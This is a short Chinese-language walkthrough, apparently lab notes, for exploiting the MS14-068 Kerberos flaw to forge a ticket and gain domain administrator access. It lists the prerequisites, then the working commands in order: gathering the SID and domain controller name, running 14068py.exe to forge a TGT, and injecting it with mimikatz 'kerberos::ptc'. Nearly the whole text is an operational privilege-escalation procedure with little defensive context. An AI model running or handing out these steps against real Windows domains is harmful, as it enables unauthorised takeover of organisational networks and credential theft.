ms-14-068票据伪造获取域管账号密码
实验条件:
1.必须知道域
2.必须知道域的账号密码
3.sid
4.域控
实验步骤:
一、利用ms-14-068漏洞进行票据伪造
1.获取普通域用户的sid
whoami /all
2.获取域名和域控名
ipconfig /all
net view /domain或net time /domain
3.上传14068py.exe,输入命令进行票据伪装,生成TGT文件
14068py.exe -u 域用户全名 -p "密码" -s sid -d 域控名全称
4.清除票据记录,清除成功
5.上传mimikatz.exe,输入以下命令使用刚才伪装的票据
mimikatz.exe "kerberos::ptc xxxxx" exit
xxxxx处替换刚才生成的TGT文件名